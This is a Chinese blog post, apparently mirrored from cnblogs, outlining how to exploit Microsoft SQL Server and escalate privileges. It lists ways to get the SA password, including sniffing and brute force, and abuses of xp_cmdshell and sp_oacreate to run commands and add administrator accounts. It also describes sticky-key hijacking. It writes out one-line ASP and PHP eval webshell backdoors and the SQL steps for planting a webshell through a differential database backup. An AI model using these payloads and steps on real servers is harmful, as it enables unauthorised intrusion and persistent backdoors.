zoukankan      html  css  js  c++  java
  • MSSQL 漏洞利用与提权

    1、SA口令的获取

    webshell或源代码的获取

    源代码泄露

    嗅探(用CAIN等工具嗅探1433数据库端口)

    口令暴力破解

    2、常见SQL server 提权命令

    查看数据库的版本(select @@version;)

    查看数据库所在服务器操作系统的参数

    查看数据库启动的参数

    查看数据库启动的时间

    查看数据库服务器名和实例名

    查看用户登录信息

    查看数据库里所所有的存储工程和函数

    查看数据库里用户和进程的信息

    恢复存储过程

    开启和关闭xp_cmdshell

    xp_cmdshell执行命令

    开启和关闭sp_oacreate

    sp_oacreate删除文件

    sp_oacreate复制文件

    sp_oacreate移动文件

    sp_oacreate添加管理员用户

    开启和关闭sp_makeweblask

    wscript.shell执行命令

    shell.applocation执行命令

    开启和关闭openrowset

    沙盒执行命令

    注册表劫持粘贴键

    sp_oacreate替换粘贴键

    public提权操作

    echo一句话后门(echo  <%eval request(cmd)%> >d:wwwrootok.asp    echo  <? php @eval($_POST[cmd]);?> >cmd.php)

    在mssql 中查询password

    3、通过数据库备份获取webshell

    差异备份一句话木马

    backup database [当前数据库名] to disk = 'c: ecycler1.bak'

    create table cmd (a image);

    insert into cmd(a) values ('<%eval request("cmd")%>');

    backup database [当前数据库名] to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT--

    LOG 备份一句话木马(......)

  • 相关阅读:
    2017.3.10组合数学学习——多重集合的排列、组合,有限概率
    poj 3169 Layout
    poj 1201 Intervals
    poj 1716 Integer Intervals
    2017.3.9 组合数学学习——组合、多重集排列
    [HNOI 2013]切糕
    思维相似处总结(未完待续)
    bzoj 3673: 可持久化并查集 by zky
    SDOI2013 森林
    标题还没想好
  • 原文地址:https://www.cnblogs.com/linuxsec/p/10012624.html
Copyright © 2011-2022 走看看